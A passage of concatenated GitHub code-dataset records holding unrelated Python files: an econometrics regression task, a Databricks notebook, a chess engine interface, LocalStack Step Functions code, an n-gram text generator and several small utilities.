\"theta\"]\n\n df = df[params + controls].dropna()\n\n # Merge indicator whether indices are valid\n pat_rec_dur = pd.read_pickle(depends_on[\"pat_rec_and_dur_restrictions\"])\n indices_single_waves = put_reg_sample_together(\n in_path_dict=depends_on,\n asset_calc=model_spec[\"asset_calc\"],\n restrictions=model_spec[\"restrictions\"],\n models=list(range(1, 7)),\n indices=True,\n indices_mean=False,\n )\n\n indices_single_waves[\"valid_indices\"] = (\n (indices_single_waves[\"ll_insen\"] <= 1)\n & (\n -indices_single_waves[\"ll_insen\"]\n <= indices_single_waves[\"ambig_av\"] * 2\n )\n & (indices_single_waves[\"ambig_av\"] * 2 <= indices_single_waves[\"ll_insen\"])\n )\n temp = indices_single_waves.groupby(\"personal_id\")[\"valid_indices\"].all()\n temp.name = \"all_indices_valid\"\n df = df.join(temp)\n\n indices_single_waves = indices_single_waves.join(pat_rec_dur[\"valid_choice\"])\n indices_single_waves[\"valid_choice_and_index\"] = (\n indices_single_waves[\"valid_choice\"] & indices_single_waves[\"valid_indices\"]\n )\n temp = (\n indices_single_waves.groupby(\"personal_id\")[\"valid_choice_and_index\"].sum()\n >= 2\n )\n temp.name = \"at_least_2_waves_with_valid_choice_and_index\"\n df = df.join(temp)\n cluster_var = (\n \"personal_id\"\n if (model_spec[\"indices_params\"] and not model_spec[\"indices_mean\"])\n else None\n )\n # controls = [c for c in controls if \"numeracy\" not in c]\n\n reg_para_on_ind_chars(\n df,\n params,\n controls,\n cluster_var,\n produces[\"model_comp_on_chars\"],\n )\n\n # Also regress risk_aversion and numeracy on characteristics\n reg_risk_numeracy_on_controls(df, produces[\"additional_vars_on_chars\"])\n","repo_name":"ChristianZimpelmann/replication-ambig-beliefs","sub_path":"ambig_beliefs/final/task_reg_model_comps_on_ind_chars.py","file_name":"task_reg_model_comps_on_ind_chars.py","file_ext":"py","file_size_in_byte":9735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"32050036460","text":"# To add a new cell, type '# %%'\n# To add a new markdown cell, type '# %% [markdown]'\n# %% [markdown]\n# ## Setup spark and dbutils. Some shortcuts are in library.config\n\n# %%\nfrom library import config\n\nspark, dbutils = config.setup_environment()\n\n\n# %%\ndef displaydf(df):\n display(df.limit(1000).toPandas()) \n\n\n# %%\n# It works!\n\ndisplaydf(\n spark.sql(\"select 1\")\n)\n\n# %% [markdown]\n# ## Use part of the dbutils library\n\n# %%\n# Use dbutils.fs\ndbutils.fs.ls(\"/\")\n\n\n# %%\n# Use dbutils.secrets. First time you will need to follow the steps.\ndbutils.secrets.get(\"secret-scope\", \"secret\")\n\n# %% [markdown]\n# ## Use custom transformations defined in library\n\n# %%\ndf = spark.createDataFrame([[1, 2], [3, 4]]).toDF(\"x\", \"y\")\n\ndisplaydf(df)\n\n\n# %%\nfrom library import transformations\n\ndisplaydf(\n df.transform(transformations.add)\n)\n\n# %%\n","repo_name":"pblocz/databricks-connect-python-template","sub_path":"notebooks/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"22012775049","text":"import gspread\r\nfrom oauth2client.service_acount import ServiceAccountCredentials\r\nimport pprint\r\nimport spreadsheets\r\nimport sqlite3\r\n\r\nscope = ['https://spreadsheets.google.com/feeds']\r\ncreds = ServiceAccountCredentials.from_json_keyfile_name('UserSearch-d26bd5aa4998.json', scope)\r\nclient = gspread.authorize(creds)\r\n\r\nsheet = client.open('User_Search').sheet1\r\n\r\npp = pprint.PrettyPrinter()\r\nall_data = get_all_records()\r\n\r\n#finds the total number of rows (entries) entered in the first column\r\nnum = len(sheet.col_values(1))\r\n\r\n#finds the results from the latest row entry\r\nresult = sheet.row_values(num)\r\n\r\n#espablishing connection to database\r\nconnection = sqlite3.connect(\"people.db\")\r\n\r\n#creatinc cursor\r\ncrsr = connection.cursor()\r\n\r\n\r\nimport unichoice as u_lan\r\nimport subjectandlang_chosen as s_lan\r\nimport countryandlang_chosen as c_lan\r\nimport languagechosenonly as o_lan\r\n\r\nif (result[3] != \"na\"):\r\n\tif (result[2] != \"na\"):\r\n\t\tcrsr.execute(c_lan)\r\n\telif(result[1] != \"NONE\"):\r\n\t\tcrsr.execute(s_lan)\r\n\telif(result[0] != \"NONE\"):\r\n\t\tcrsr.execute(u_lan)\r\n\telse:\r\n\t\tcrsr.execute(o_lan)\r\n\r\nconnection.commit()\r\nconnection.close()\r\n\r\n","repo_name":"jinthespaceguy/coeus","sub_path":"data_sorting.py","file_name":"data_sorting.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"70565766644","text":"import chess\nfrom chess import InvalidMoveError\nimport search\nfrom nn.model import nnEval_model_halfKP, halfKP_Net\nCOLOR_TABLE = {\n 0: 'Black',\n 1: 'White'\n}\n\n\ndef getMove(board: chess.Board) -> chess.Move:\n move = input(\"Enter your move in UCI format. eg. g1f3| q to quit \")\n if move == 'q':\n return move\n # Checks if move is in valid UCI format\n try:\n move = chess.Move.from_uci(move)\n except InvalidMoveError:\n print('Invalid move.')\n move = getMove(board)\n\n if move not in board.legal_moves:\n print('Illegal move')\n move = getMove(board)\n\n return move\n\ndef evaluation_from_FEN():\n fen = input(\"Input FEN: \")\n depth = int(input('Input depth of engine search. (Integer): '))\n qs_depth = int(input('Input quiescence search depth. (Integer): '))\n\n board = chess.Board(fen=fen)\n halfkp_chkpt = './nn/lightning_logs/version_2/checkpoints/epoch=67-step=215152.ckpt'\n halfkp_model = nnEval_model_halfKP.load_from_checkpoint(halfkp_chkpt, net=halfKP_Net(40960, 256, 64, 64))\n net = halfkp_model.net\n searcher = search.SearcherNNUE(net)\n evaluation, move = searcher.search(board, depth, qs_depth)\n print(f'Evaluation: {evaluation.item()}| Best move: {move.uci()}')\n\n# Litterally 1-8 but as strings\nONETOEIGHT = list(map(str,range(1,9)))\n\ndef printBoard(board: chess.Board, perspective):\n board, *_ = board.fen().split()\n board = board.split('/')\n for i, col in enumerate(board) if perspective == 1 else list(enumerate(board))[::-1]: # iterate through board upside down if black\n print(8 - i, end='') # print row number\n for piece in col if perspective == 1 else col[::-1]: # columns also have to be reversed if black since board is rotated\n if piece in ONETOEIGHT:\n # print number times \" .\"\n print(int(piece) * \" ·\", end='')\n else:\n # print unicode representation of piece\n print(f' {chess.UNICODE_PIECE_SYMBOLS[piece]}', end='')\n\n print()\n AtoH = [chr(i) for i in range(65, 73)]\n print(\" \" + \" \".join(AtoH if perspective == 1 else AtoH[::-1])) # prints column letters\n\n\ndef main():\n fen = input(\"Enter starting board FEN. Press Enter to start normally. \")\n depth = int(input('Input depth of engine search. (Integer): '))\n qs_depth = int(input('Input quiescence search depth. (Integer): '))\n # Get player side\n player_side = input(\"Enter side to move. (1)white (0)black: \")\n while not (player_side == '0' or player_side == '1'):\n player_side = input(\"Enter side to move. (1)white (0)black: \")\n player_side = int(player_side)\n # Initilise board object\n if fen:\n board = chess.Board(fen)\n else:\n board = chess.Board()\n\n # Initialize model and searcher \n halfkp_chkpt = './nn/lightning_logs/version_2/checkpoints/epoch=67-step=215152.ckpt'\n halfkp_model = nnEval_model_halfKP.load_from_checkpoint(halfkp_chkpt, net=halfKP_Net(40960, 256, 64, 64))\n net = halfkp_model.net\n searcher = search.SearcherNNUE(net)\n\n printBoard(board, player_side)\n while True:\n # If player to move get move from player\n if board.turn == player_side:\n move = getMove(board)\n\n else: # Otherwise use engine move\n evaluation, move = searcher.search(board, depth, qs_depth)\n print(f'Evaluation: {evaluation.item()}')\n\n if move == 'q':\n break\n\n board.push(move) # play move\n printBoard(board, player_side)\n\n if board.is_checkmate():\n print(COLOR_TABLE[1 - board.turn], 'wins')\n break\n\n if board.is_stalemate():\n print('Draw')\n break\n \n print(f'End board FEN: {board.fen()}')\n\n\nif __name__ == '__main__':\n main()\n\n \n\n\n","repo_name":"DuffyMoby/ChessNEA","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"73024201523","text":"# Задача 14. Напишите программу, которая принимает на вход вещественное число\n# и показывает сумму его цифр.\n\n# Пример:\n# - 6782 -> 23\n# - 0,56 -> 11\n\nR = float(input(\"Введите вещественное число: \"))\nsave = R\nR = abs(R) # вдруг отрицательное введут\n\nwhile not R.is_integer(): # делаем целое число из дробного\n R *= 10\n\nsumm = 0\nwhile (R > 0):\n summ += R % 10 # считаем цифры\n R = R // 10\n\nprint(f'Сумма цифр числа {save} равна {int(summ)}')\n","repo_name":"Zep314/PyHW02","sub_path":"task01.py","file_name":"task01.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"711657508","text":"import os\nimport sys\nimport time\nimport math\nfrom datetime import datetime\nimport random\nimport logging\nfrom collections import OrderedDict\nimport numpy as np\nimport cv2\nimport torch\nfrom torchvision.utils import make_grid\nfrom shutil import get_terminal_size\n\nimport yaml\ntry:\n from yaml import CLoader as Loader, CDumper as Dumper\nexcept ImportError:\n from yaml import Loader, Dumper\n\n\ndef OrderedYaml():\n '''yaml orderedDict support'''\n _mapping_tag = yaml.resolver.BaseResolver.DEFAULT_MAPPING_TAG\n\n def dict_representer(dumper, data):\n return dumper.represent_dict(data.items())\n\n def dict_constructor(loader, node):\n return OrderedDict(loader.construct_pairs(node))\n\n Dumper.add_representer(OrderedDict, dict_representer)\n Loader.add_constructor(_mapping_tag, dict_constructor)\n return Loader, Dumper\n\n\n####################\n# miscellaneous\n####################\n\n\ndef get_timestamp():\n return datetime.now().strftime('%y%m%d-%H%M%S')\n\n\ndef mkdir(path):\n if not os.path.exists(path):\n os.makedirs(path)\n\n\ndef mkdirs(paths):\n if isinstance(paths, str):\n mkdir(paths)\n else:\n for path in paths:\n mkdir(path)\n\n\ndef mkdir_and_rename(path):\n if os.path.exists(path):\n new_name = path + '_archived_' + get_timestamp()\n print('Path already exists. Rename it to [{:s}]'.format(new_name))\n logger = logging.getLogger('base')\n logger.info('Path already exists. Rename it to [{:s}]'.format(new_name))\n os.rename(path, new_name)\n os.makedirs(path)\n\n\ndef set_random_seed(seed):\n random.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n\n\ndef setup_logger(logger_name, root, phase, level=logging.INFO, screen=False, tofile=False):\n '''set up logger'''\n lg = logging.getLogger(logger_name)\n formatter = logging.Formatter('%(asctime)s.%(msecs)03d - %(levelname)s: %(message)s',\n datefmt='%y-%m-%d %H:%M:%S')\n lg.setLevel(level)\n if tofile:\n log_file = os.path.join(root, phase + '_{}.log'.format(get_timestamp()))\n fh = logging.FileHandler(log_file, mode='w')\n fh.setFormatter(formatter)\n lg.addHandler(fh)\n if screen:\n sh = logging.StreamHandler()\n sh.setFormatter(formatter)\n lg.addHandler(sh)\n\n\n####################\n# Pytorch Tensor <-> state\n####################\ndef state2tensor(state):\n \"\"\"\n :param state: numpy array (NHWC), 10 bit\n :return: Pytorch Tensor (NCHW)\n \"\"\"\n state = state.copy().astype(np.float32) / 1023.\n tensor = torch.Tensor(np.transpose(state, [0, 3, 1, 2]))\n return tensor\n\n\ndef tensor2state(tensor):\n \"\"\"\n :param tensor: Pytorch Tensor (NCHW)\n :return: numpy array (NHWC), 10 bit\n \"\"\"\n state = np.transpose(tensor.numpy().copy(), [0, 2, 3, 1])\n state *= 1023\n state = state.astype(np.int16)\n state = np.maximum(state, 0) # <0 may cause error while processing\n return state\n\n\ndef tensor2bgr(tensor, is_uint8=True):\n \"\"\"\n :param tensor: 1CHW tensor [0., 1.]\n :param is_uint8: whether to output uint8 (if not, output original dtype)\n :return: BGR image [0, 255] if is_uint8 else [0., 1.]\n \"\"\"\n image = tensor.detach().cpu().numpy()\n if image.ndim == 4:\n image = image[0]\n image = np.transpose(image, axes=[1, 2, 0]) # HWC, BGR image\n\n if is_uint8:\n image = np.clip(image * 255, 0, 255)\n image = image.astype(np.uint8)\n else:\n pass\n\n return image.copy()\n\n\n####################\n# Metric (e.g., PSNR)\n####################\ndef psnr(img1, img2):\n # 10 bit image\n if img1.dtype == np.int16:\n img1 = img1.astype(np.float32) / 1023.\n if img1.dtype == np.uint8:\n img1 = img1.astype(np.float32) / 255.\n if img2.dtype == np.int16:\n img2 = img2.astype(np.float32) / 1023.\n if img2.dtype == np.uint8:\n img2 = img2.astype(np.float32) / 255.\n\n mse = (img1 - img2) ** 2\n mse = mse.mean()\n return 10 * math.log10(1. / mse)\n","repo_name":"yuke93/ReconfigISP","sub_path":"codes/utils/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":4060,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"75"} +{"seq_id":"23788944317","text":"class UF:\n def __init__(self, n):\n self.parent = list(range(n))\n self.size = [1] * n\n self.cnt = n\n\n def find(self, x):\n if x != self.parent[x]:\n self.parent[x] = self.find(self.parent[x])\n return self.parent[x]\n return x\n def union(self, x,y):\n x, y = self.find(x), self.find(y)\n if x == y:\n return False\n if self.size[x] < self.size[y]:\n x, y = y, x\n self.parent[y] = x\n self.size[x] += self.size[y]\n self.cnt -= 1\n return True\n \n def connected(self, x, y):\n x, y = self.find(x), self.find(y)\n return x == y\n\nclass Solution:\n def maxNumEdgesToRemove(self, n, edges):\n ufa, ufb = UF(n), UF(n)\n ans = 0\n \n # 节点编号改为从 0 开始\n for edge in edges:\n edge[1] -= 1\n edge[2] -= 1\n\n # 公共边\n for t, u, v in edges:\n if t == 3:\n if not ufa.union(u, v):\n ans += 1\n else:\n ufb.union(u, v)\n\n # 独占边\n for t, u, v in edges:\n if t == 1:\n # Alice 独占边\n if not ufa.union(u, v):\n ans += 1\n elif t == 2:\n # Bob 独占边\n if not ufb.union(u, v):\n ans += 1\n\n if ufa.cnt != 1 or ufb.cnt != 1:\n return -1\n return ans","repo_name":"mengyuqianxun/coding-interview-Python","sub_path":"Leetcode/1579.py","file_name":"1579.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"14101872331","text":"from botocore.exceptions import ClientError\n\nfrom localstack.aws.api.stepfunctions import (\n HistoryEventExecutionDataDetails,\n HistoryEventType,\n TaskFailedEventDetails,\n TaskScheduledEventDetails,\n TaskStartedEventDetails,\n TaskSucceededEventDetails,\n)\nfrom localstack.services.stepfunctions.asl.component.common.error_name.custom_error_name import (\n CustomErrorName,\n)\nfrom localstack.services.stepfunctions.asl.component.common.error_name.failure_event import (\n FailureEvent,\n)\nfrom localstack.services.stepfunctions.asl.component.common.error_name.states_error_name import (\n StatesErrorName,\n)\nfrom localstack.services.stepfunctions.asl.component.common.error_name.states_error_name_type import (\n StatesErrorNameType,\n)\nfrom localstack.services.stepfunctions.asl.component.state.state_execution.state_task.service.state_task_service import (\n StateTaskService,\n)\nfrom localstack.services.stepfunctions.asl.component.state.state_execution.state_task.state_task_lambda import (\n LambdaFunctionErrorException,\n StateTaskLambda,\n)\nfrom localstack.services.stepfunctions.asl.eval.environment import Environment\nfrom localstack.services.stepfunctions.asl.eval.event.event_detail import EventDetails\nfrom localstack.services.stepfunctions.asl.utils.encoding import to_json_str\n\n\nclass StateTaskServiceLambda(StateTaskService, StateTaskLambda):\n @staticmethod\n def _error_cause_from_client_error(client_error: ClientError) -> tuple[str, str]:\n error_code: str = client_error.response[\"Error\"][\"Code\"]\n error_msg: str = client_error.response[\"Error\"][\"Message\"]\n response_details = \"; \".join(\n [\n \"Service: AWSLambda\",\n f\"Status Code: {client_error.response['ResponseMetadata']['HTTPStatusCode']}\",\n f\"Error Code: {error_code}\",\n f\"Request ID: {client_error.response['ResponseMetadata']['RequestId']}\",\n \"Proxy: null\",\n ]\n )\n error = f\"Lambda.{error_code}\"\n cause = f\"{error_msg} ({response_details})\"\n return error, cause\n\n def _from_error(self, env: Environment, ex: Exception) -> FailureEvent:\n if isinstance(ex, LambdaFunctionErrorException):\n error = \"Exception\"\n error_name = CustomErrorName(error)\n cause = ex.payload\n elif isinstance(ex, ClientError):\n error, cause = self._error_cause_from_client_error(ex)\n error_name = CustomErrorName(error)\n else:\n error = \"Exception\"\n error_name = StatesErrorName(typ=StatesErrorNameType.StatesTaskFailed)\n cause = str(ex)\n\n return FailureEvent(\n error_name=error_name,\n event_type=HistoryEventType.TaskFailed,\n event_details=EventDetails(\n taskFailedEventDetails=TaskFailedEventDetails(\n error=error,\n cause=cause,\n resourceType=self._get_resource_type(),\n resource=self.resource.api_action,\n )\n ),\n )\n\n def _eval_execution(self, env: Environment) -> None:\n parameters = self._eval_parameters(env=env)\n parameters_str = to_json_str(parameters)\n env.event_history.add_event(\n hist_type_event=HistoryEventType.TaskScheduled,\n event_detail=EventDetails(\n taskScheduledEventDetails=TaskScheduledEventDetails(\n resourceType=self._get_resource_type(),\n resource=self.resource.api_action,\n region=self.resource.region,\n parameters=parameters_str,\n )\n ),\n )\n env.event_history.add_event(\n hist_type_event=HistoryEventType.TaskStarted,\n event_detail=EventDetails(\n taskStartedEventDetails=TaskStartedEventDetails(\n resourceType=self._get_resource_type(),\n resource=self.resource.api_action,\n )\n ),\n )\n\n super()._exec_lambda_function(env=env)\n response = env.stack[-1]\n\n env.event_history.add_event(\n hist_type_event=HistoryEventType.TaskSucceeded,\n event_detail=EventDetails(\n taskSucceededEventDetails=TaskSucceededEventDetails(\n resourceType=self._get_resource_type(),\n resource=self.resource.api_action,\n output=to_json_str(response),\n outputDetails=HistoryEventExecutionDataDetails(truncated=False),\n )\n ),\n )\n","repo_name":"TRT-LewisH/neo4j_bulkloader","sub_path":"neo4j-rdfloader/Lib/site-packages/localstack/services/stepfunctions/asl/component/state/state_execution/state_task/service/state_task_service_lambda.py","file_name":"state_task_service_lambda.py","file_ext":"py","file_size_in_byte":4672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"40602202823","text":"from pathlib import Path\n\nfrom runbox.models import DockerProfile\n\nfrom bulb.models import LanguageProfile\n\ncpp17_profile = LanguageProfile(\n language='cpp',\n version='cpp-17',\n build_profile=DockerProfile(\n image='gcc10',\n workdir=Path('/build'),\n cmd_template=['g++', 'main.cpp', '--std=c++17', '/sandbox/build'],\n user='builder'\n ),\n profile=DockerProfile(\n image='gcc10',\n workdir=Path('/sandbox'),\n cmd_template=['/sandbox/build'],\n user='sandbox',\n ),\n)\n\ncpp11_profile = cpp17_profile.copy(update={\n 'version': 'cpp-11',\n 'build_profile': {\n 'cmd_template': ['g++', 'main.cpp', '--std=c++11', '/sandbox/build']\n }\n})\n\npython3_10_profile = LanguageProfile(\n language='python',\n version='3.10',\n profile=DockerProfile(\n image='python3.10-sandbox',\n workdir=Path('/sandbox'),\n cmd_template=['python', 'main.py'],\n user='sandbox',\n ),\n)\n\npython2_7_profile = LanguageProfile(\n language='python',\n version='2.7',\n profile=DockerProfile(\n image='python2.7-sandbox',\n workdir=Path('/sandbox'),\n cmd_template=['python', 'main.py'],\n user='sandbox',\n )\n)\n","repo_name":"burenotti/flask-editor-api","sub_path":"bulb/profiles.py","file_name":"profiles.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"25683869161","text":"#!usr/bin/env python \n# -*- coding:utf-8 _*-\n\"\"\" \n@author:Long.Hou\n@file: mes.py \n@time: 2022/01/07 \n@email:long.hou2@luxshare-ict.com\n\"\"\"\nimport os.path\nimport json\nimport time\n\nfrom Tools.logDriver import LogDriver\nimport requests\n\n'''200\n0 SFC_OK\nNO X BOAR'''\n\n'''\n0 SFC_OK tsid::SIP Measurement-A6-3F-S09-1::unit_process_check=UNIT OUT OF PROCESS TERMINAL_NAME ERROR!'''\n\n\nclass Mes:\n def __init__(self):\n self.url = 'http://10.100.2.69/Bobcat/Sfc_Response.aspx'\n self.config_path = os.path.expanduser(\"~/H26_SIP_Sorting/config.json\")\n self.log = LogDriver(os.path.expanduser(f\"~/H26_SIP_Sorting/MESLOG/MesLog{time.strftime('%Y%m%d%H%M')}.txt\"))\n try:\n if os.path.exists(self.config_path):\n with open(self.config_path, 'r') as f:\n self.config = json.load(f)\n except Exception as e:\n self.log.mes_error_log(url=self.url,data='Not found config.json file,pleace try again!',error=e)\n self.config= {}\n\n\n def get_SIP_X_num(self, sn):\n result = False, None\n try:\n data = {'p': \"SIP_X_NUM\", \"c\": \"QUERY_RECORD\", \"sn\": sn}\n response = requests.post(url=self.url, data=data,timeout=3)\n self.log.mes_log(func_name='get_SIP_X_num',url=self.url,data=data,response=response)\n if response.status_code == 200:\n if \"SFC_OK\" in response.text:\n l1 = response.text.split(\"SFC_OK\")[1]\n if 'NO X BOAR' in l1:\n result = True, []\n else:\n result = True, map(int, l1.split(',')[1:])\n except Exception as e:\n result = False, \"get_SIP_X_num Error\\n{}\".format(e)\n return result\n\n def check_process(self, sn):\n result = False, \"Process Error\\n unit_process_check=UNIT OUT OF PROCESS TERMINAL_NAME ERROR!\"\n try:\n data = {'p': \"unit_process_check\", \"c\": \"QUERY_RECORD\", 'sw_version': self.config['sw_version'],\n 'tsid': self.config['station_id'],\"sn\": sn,'fixture_id': None}\n response = requests.post(url=self.url, data=data,timeout=3)\n self.log.mes_log(func_name=\"check_process\",url=self.url, data=data, response=response)\n if response.status_code == 200:\n if \"SFC_OK\" in response.text:\n if response.text.endswith(\"unit_process_check=OK\"):\n result = True, 'unit_process_check=OK'\n else:\n result = False, 'Process Error\\n'+response.text.split('::')[-1]\n except Exception as e:\n result = False, \"check_process Error\\n{}\".format(e)\n return result\n\n def update_test_value_to_mes(self, data):\n '''\n :param data: data 为字典,其中要有result,audio_mode,start_time,stop_time,sn,\n fixture_id,test_head_id,list_of_failing_tests,failure_message\n :return:\n '''\n result = False\n try:\n for k in self.config.keys():\n data[k] = self.config[k]\n data[\"c\"] = \"ADD_RECORD\"\n response = requests.post(url=self.url, data=data,timeout=3)\n self.log.mes_log(func_name='update_test_value_to_mes',url=self.url, data=data, response=response)\n if response.status_code == 200:\n if \"SFC_OK\" in response.text:\n result = True\n except Exception as e:\n self.log.mes_error_log(func_name='update_test_value_to_mes',url=self.url,data=data,error=e)\n result = False\n return result\n\n\nif __name__ == '__main__':\n mes = Mes()\n sn = 'CH26RB2102004CC'\n\n # mes.get_SIP_X_num(sn)\n # for i in range(10):\n # if i==9:\n # mes.check_process(\"{}{}\".format(sn,i+1))\n # else:\n # mes.check_process(\"{}0{}\".format(sn, i + 1))\n for i in range(1,10):\n data = {'result': 'PASS', 'audit_mode': 0, 'start_time': time.strftime(\"%H:%M:%S\"),\n 'stop_time': time.strftime(\"%H:%M:%S\"),\n 'sn': '{}0{}'.format(sn,i),\n 'fixture_id': i, 'test_head_id': i, 'list_of_failing_tests': '', 'failure_message': ''}\n # mes.update_test_value_to_mes(data)\n data = {'result': 'PASS', 'audit_mode': 0, 'start_time': time.strftime(\"%H:%M:%S\"),\n 'stop_time': time.strftime(\"%H:%M:%S\"),\n 'sn': '{}10'.format(sn),\n 'fixture_id': 10, 'test_head_id': 10, 'list_of_failing_tests': '', 'failure_message': ''}\n # mes.update_test_value_to_mes(data)\n mes.get_SIP_X_num(sn)","repo_name":"Faith-lyle/H26_SIP_sorting_5","sub_path":"Tools/mes.py","file_name":"mes.py","file_ext":"py","file_size_in_byte":4664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"36140477432","text":"from bs4 import BeautifulSoup\nimport requests\nfrom practice1 import getPhoneNumber\nfrom sys import argv\n\ndef searchYellowP():\n\tterm = argv[1]\n\tlocation = argv[2].split(\" \")\n\t# query = \"+\".join(term.split(' '))\n\tr = requests.get('http://www.yellowpages.com/search?search_terms=' + str(term) + '&geo_location_terms='+ location[0] +'%2C+CA')\n\tsoup = BeautifulSoup(r.content, \"html5lib\")\n\thtmlList = soup.find_all('div', {\"class\": \"info\"})\n\tfor item in htmlList:\n\t\tif getPhoneNumber(item.text) is not None:\n\t\t\tcompanyName = item.find_all('h3', {'class': 'n'})\n\t\t\tprint(getPhoneNumber(item.text).group(), companyName[0].text, term)\n\n\n\nsearchYellowP()\n","repo_name":"masakistewart/yellow-pages-cli-scraper","sub_path":"yellowPagesScrape.py","file_name":"yellowPagesScrape.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"7156319160","text":"#!/usr/bin/env python3.4\n\nimport os\nimport json\nimport logging\nimport sys\nimport time\nimport datetime\n\nfrom argparse import ArgumentParser\nfrom models.markov_model import MarkovModel\nfrom models.ngram_model import NGramModel\nfrom lib.util import CONST_END_WORD\nfrom lib.util import computePerplexity\n\nFORMAT = \"%(asctime)s: %(name)s:%(lineno)d (%(process)d/%(threadName)s) - %(levelname)s - %(message)s\"\nlogging.basicConfig(level=logging.INFO, format=FORMAT)\nlogger = logging.getLogger(__name__)\n\n\nparser = ArgumentParser(description=\"Generate article based on input domain and topic using ngram model\")\nparser.add_argument('--filters', '-f', action='append',\n help='Filters for data collection')\nparser.add_argument('--domainList', '-d', action='append', required=True,\n help='Specify domain (news source) for training ngram')\nparser.add_argument('--generateDomain', '-D', action='store',\n help='Specify domain for generating article', required=True)\nparser.add_argument('--generateTopic', '-t', action='store',\n help='Specify topic for generating article', required=True)\nparser.add_argument('--sizeList', '-s', action='append',\n help='Number of of words in ngram')\nparser.add_argument('--basedir', '-b', action='store',\n help='directory for train data', required=True)\nparser.add_argument('--length', '-l', action='store', default=1000,\n help='Maximum number of words in generated article')\nparser.add_argument('--perplexity', '-p', action='store_true', default=False,\n help='Compute perplexity on test data')\nparser.add_argument('--generate', '-g', action='store_true', default=False,\n help='generate article')\nparser.add_argument('--testDir', '-T', action='store',\n help='directory for test data')\n\n\nargs = parser.parse_args()\n\nlogger.info(\"args: %s\" % args)\n\nfilters = []\nif args.filters:\n filters = args.filters\n\nmaxLength = int(args.length)\nwindowSizeList = [int(size) for size in args.sizeList]\nbaseDir = args.basedir\ndomainList = args.domainList\ngenerateDomain = args.generateDomain\ngenerateTopic = args.generateTopic\n\nstartTime = time.time()\nng = NGramModel(windowSizeList, generatePdf=args.generate, filters=filters)\nng.countNgrams(domainList, baseDir)\nnGramModel = ng.generateModel()\n\nngTypeCount = [key for key, _ in ng.ngramCount.items()]\n\nprint(\"vocab size: %s\" % ng.vocabSize)\nprint(\"ngram types: %s\" % len(ngTypeCount))\nfor size in windowSizeList:\n print(\"size of ngram model %s: %s\" % (size, sys.getsizeof(ng.nGramProb[size])))\n\nprint(\"Time elapsed: %s\" % str(datetime.timedelta(seconds=time.time()-startTime)))\n\nif args.generate:\n # For generating sentences use max window size\n windowSize = max(windowSizeList)\n mv = MarkovModel(nGramModel, windowSize, generateDomain, generateTopic)\n cState = mv.startState()\n article = []\n for _ in range(maxLength):\n cState = mv.generate(cState)\n cWord = cState[-1]\n if cWord == CONST_END_WORD:\n logger.debug(\"reached end of the article\")\n break\n\n article.append(cState[-1])\n\n print(\" \".join(article))\n\nif args.perplexity:\n if not args.testDir:\n raise Exception(\"Need to input test directory\")\n\n pvaluesList = []\n articleText = \"\"\n for (currDir, _, fileList) in os.walk(args.testDir):\n for filename in fileList:\n if filename.endswith('.json'):\n fullName = os.path.join(currDir, filename)\n # print(\"filename : %s\" % fullName)\n with open(fullName, \"r\") as f:\n cData = json.load(f)\n articleText += cData.get(\"article\", None)\n #articleText = cData.get(\"article\", None)\n #pvaluesList.append(computePerplexity(articleText, ng))\n\n #print(\"articleText: %s\" % articleText)\n pvaluesList.append(computePerplexity(articleText, ng))\n\n logger.debug(\"pvaluesList: %s\" % pvaluesList)\n logger.info(\"max perplexity: %s\" % max(pvaluesList))\n logger.info(\"mean perplexity: %s\" % (sum(pvaluesList)/len(pvaluesList)))\n logger.info(\"min perplexity: %s\" % min(pvaluesList))\n","repo_name":"arashjamalian/cs221_ngramModel","sub_path":"generate_article.py","file_name":"generate_article.py","file_ext":"py","file_size_in_byte":4250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"40144149693","text":"import json\nfrom Comm.Accumulator import *\nimport socket\n\n\ndef waitForConnection(address, port, maxConection, objetToNotifie=None):\n server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server.bind((address, port))\n server.listen(maxConection)\n\n conn, addr = server.accept()\n objetToNotifie.newConnection(conn)\n\nclass EthernetComm:\n\n JSONTYPE =1\n\n def __init__(self, socket):\n self.sock = socket\n self.sock.setblocking(False)\n self.acc = Accumulator(self)\n self.frameReceveList = []\n self.isSocketAlive = True\n\n def receveFrame(self, frame):\n self.frameReceveList.append(frame)\n\n\n def getSocket(self):\n return self.sock\n\n def readFrame(self):\n self.extractRecevedData()\n\n if len(self.frameReceveList) > 0:\n frameToReturn = self.frameReceveList[0]\n del self.frameReceveList[0]\n \n return frameToReturn\n else:\n return None\n\n def extractRecevedData(self):\n # check for new frame\n data = 1\n while data:\n try:\n data = self.sock.recv(1024)\n if not data:\n break\n else:\n self.acc.accumulate(data)\n except:\n return None\n\n def sendJSon(self, JSON):\n frame = self.JSONtoFrame(JSON)\n self.sendFrame(frame)\n\n def JSONtoFrame(self, JSON):\n msgPayload = bytearray(json.dumps(JSON).encode(encoding=\"UTF-8\"))\n frame = Frame()\n frame.setType(EthernetComm.JSONTYPE)\n 